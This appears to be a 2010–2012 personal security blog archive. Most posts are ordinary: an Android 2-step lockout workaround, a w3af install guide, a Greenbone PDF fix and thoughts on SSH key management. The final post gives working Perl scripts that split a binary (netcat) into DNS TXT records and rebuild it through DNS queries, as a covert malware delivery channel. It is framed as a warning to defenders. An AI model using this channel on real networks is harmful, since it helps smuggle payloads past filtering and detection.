Saturday, 14 January 2012

Google 2-factor authentication and Android devices

A quick search showed that there are a lot of folks out there who have inadvertently blocked their android phones and been unable to log in with their Google credentials. This happened to me this morning and the advice generally seems to fall into two camps:
  • Exploiting a bug in the phone UI to allow access to menus during a phone call
  • Factory reset the device
There's another option which may help a growing number of users. If you have Google's 2-factor authentication switched on then username/password recovery of a locked device won't work. Switching off 2-step verification temporarily will allow you unlock you phone. Just don't forget to enable it again afterwards.

The real gripe in all of this is how poorly supported 2-step verification is particularly among third party software (and hardware) vendors. Plenty of things still break if you have 2-factor auth on and an application expects to log in with traditional credentials. Is this because it's too hard to integrate, adoption is still too low or some other reason?

Thursday, 7 July 2011

Installing w3af on Amazon Linux AMI

Having a host to scan your network from the Internet is useful and cloud providers allow us to spin up virtual servers to scratch this itch. I've been using Amazon EC2 for this and one challenge can be installing tools, particularly if you opt for one of the pre-built OS images on offer.

I've been installing w3af on just such a VM.
$ cat /etc/system-release
Amazon Linux AMI release 2011.02.1.1 (beta)

Install RPM packages
There are several RPM packages that satisfy the dependencies for w3af but you are going to be left with a fair few that require manual installation. Start by installing what you can from the yum repository.
$ sudo yum install python26 python26-devel python26-tools pyOpenSSL SOAPpy \
PyYAML libxml2-devel libxslt-devel gcc make subversion-devel gcc-c++ \
libcom_err-devel openssl-devel

Install pybloomfilter
$ wget http://pypi.python.org/packages/source/p/pybloomfiltermmap/pybloomfiltermmap-0.2.0.tar.gz#md5=7e77edec5b442bc29bb4ec5f09cb2ad5
$ tar xzvf pybloomfiltermmap-0.2.0.tar.gz
$ cd pybloomfiltermmap-0.2.0
$ sudo python setup.py install

Install nltk
$ wget http://nltk.googlecode.com/files/nltk-2.0.1rc1.tar.gz
$ tar xzvf nltk-2.0.1rc1.tar.gz
$ cd nltk-2.0.1rc1
$ sudo python setup.py install

Install lxml
$ wget http://pypi.python.org/packages/source/l/lxml/lxml-2.3.tar.gz#md5=a245a015fd59b63e220005f263e1682a
$ tar xzvf lxml-2.3.tar.gz
$ cd lxml-2.3
$ sudo python setup.py install

Install pysvn
$ wget http://pysvn.barrys-emacs.org/source_kits/pysvn-1.7.5.tar.gz
$ tar xzvf pysvn-1.7.5.tar.gz
$ cd pysvn-1.7.5
$ sudo python setup.py install

Install scapy
$ wget http://www.secdev.org/projects/scapy/files/scapy-latest.tar.gz
$ tar xzvf scapy-latest.tar.gz
$ cd scapy-2.1.0
$ sudo python setup.py install

Install w3af
All being well you should have all of the dependencies installed. Check out the latest code from svn and away you go.

$ svn co https://w3af.svn.sourceforge.net/svnroot/w3af/trunk w3af
$ cd w3af
$ ./w3af_console

Wednesday, 15 June 2011

PDF reports in Greenbone Security Assistant

I've seen a few forum posts on PDF report generation failing on Greenbone Security Assistant, particularly when installing for pre-compiled packages. If you check in the /tmp directory you will find the remains of the working directory used to create the report and a useful log file.
! LaTeX Error: File `utf8x.def' not found.
There's a quick workaround that deals with this missing dependency since no CentOS package actually contains utf8x.def.
[root@server ~]# cd /usr/share/texmf/tex/latex/base/
[root@server base]# ln -s utf8.def utf8x.def
[root@server base]# texhash
PDF reporting should now work.

Monday, 26 July 2010

Centralised Management of OpenSSH keys

I love OpenSSH. It's a wonderfully versatile way of securing logins and data in transit between systems. One bugbear of mine is how difficult it becomes to manage authentication keys. I've posted about this in the long distant past (the Internet has a long memory) and the subject just won't die, at least not in my mind. So why does this still bug me?

In truth little has changed over the years in the way SSH keys are handled. Keys are managed in userland, with each user being able to add keys that are trusted for authentication their account. This is all well and good until the web of trust between host accounts, keys and key owners becomes unmanageable. Who owns or possesses each of the keys in the authorized_keys files, for every user on every host? Are the private keys well protected?

One solution might be to centralise SSH key management and move key management to a more strictly controlled environment. I imagine it working something like traditional Unix account management; a file where, unlike the Unix shadow file, more than one authentication token can be linked to an account. This file is owned by root and special tools (like passwd) must be used so less privileged users can update and maintain the list of keys linked to their user account. This would allow for management and auditing of SSH keys from a single location.

There are other benefits to be gained from this type of key management. Rules could be added to enforce storage of additional metadata along with the key such as who owns it an expiry date to limit the lifetime of a key. Maybe I should dust off my C++ textbooks and take a look at the OpenSSH source...

Tuesday, 8 June 2010

Deliver your malware by DNS

HTTP is probably the most common way for distributing malware and for downloading tools onto compromised systems. Too many people are still allowing unfettered access from their server farm to port 80, but perhaps things are getting better. In the hope that one day servers won't be able to wget the latest rootkit once they're owned what other ways are their to deliver a payload?

The domain name system allows for TXT records that can contain a text string. Once intended to hold human-readable information about a host it can and has been used to store other information such as SPF and DKIM records. Since we can feed arbitrary text data into a TXT record we could use this to store binaries data encoded as text using base64 or uuencode for example. I thought I would give this a go an wrote a little perl script to encode a file into DNS entries.
#!/usr/bin/perl
use MIME::Base64;
use Digest::MD5 qw(md5_hex);

# Get content source
$file = "nc.exe";
$name = "nc";
$prefix = "part";
$domain = ".example.net.";

open IN, "<$file" || die "Cannot open $file: $?\n"; while () {
$string .= $_;
}
close IN;

$md5 = md5_hex($string);
@parts = split("\n",encode_base64($string));
$numparts = $#parts + 1;

$output = "${name}${domain} IN TXT \"md5=$md5; prefix=${prefix}; parts=$numparts;\"\n";
for ($i = 0; $i <= $#parts; $i++) {
$output .= "${prefix}${i}${domain} IN TXT \"$parts[$i]\"\n";
}
print $output;
What you get out from this script is a list BIND zone file style DNS records. I encoded the old favourite netcat and the first few lines of output are shown below.
nc IN TXT "md5=28dd8edad7008289957031606f210675; prefix=part; parts=459;"
part0 IN TXT "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
part1 IN TXT "AAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v"
part2 IN TXT "ZGUuDQ0KJAAAAAAAAABQRQAATAEFAKlLOT8AAAAAAAAAAOAADwILAQI4AFQAAABiAAAAAgAAABAA"
part3 IN TXT "AAAQAAAAcAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAACwAAAABAAAVLEAAAMAAAAAACAA"
The first record is a contains the metadata relating to the encoded file. It consists of the MD5 checksum of the original file, a prefix for the TXT records containing the data and the number of records the payload is split across. Add a number starting from zero to the prefix, request, increment and repeat.

This script recovers the encoded file using DNS queries.
#!/usr/bin/perl
use MIME::Base64;
use Digest::MD5 qw(md5_hex);
use Net::DNS::RR;

$file = "nc";
$domain = "example.net";

$res = Net::DNS::Resolver->new( nameservers => [qw(127.0.0.1)] );
my $answer = $res->query("$file.$domain", 'TXT');
@txt=$answer->answer;
($initial) =  $txt[0]->char_str_list();

# extract content checksum, prefix and number of parts
$initial =~ /md5=(.*?);.*prefix=(.*?);.*parts=(.*?);/;
$md5    = $1;
$prefix = $2;
$parts  = $3;

for ($i = 0; $i < $parts; $i++) {
my $frag = $prefix . $i . "." . $domain;
my $answer = $res->query("$frag", 'TXT');
my @frags =$answer->answer;
my ($string) = $frags[0]->char_str_list();
$payload .= $string;
}

$binary = decode_base64($payload);
if (md5_hex($binary) == $md5) {
print STDERR "md5sum matches\n";
}

open OUT, ">testfile";
print OUT $binary;
close OUT;
It looks like a lot more work than dropping a file on an FTP server, and to tell the truth it is, so why bother. I can think of a few reasons. Who bothers to filter DNS requests? Who bothers to check DNS responses for malicious payloads? What IDS system is going to detect an encoded file split over hundreds or thousands of DNS requests?

If we start making it harder to deliver malware by HTTP the bay guys will up their game. It's easy to see that they don't need to up much to defeat the perimeter controls of most organisations by abusing a service core to the way the Internet works.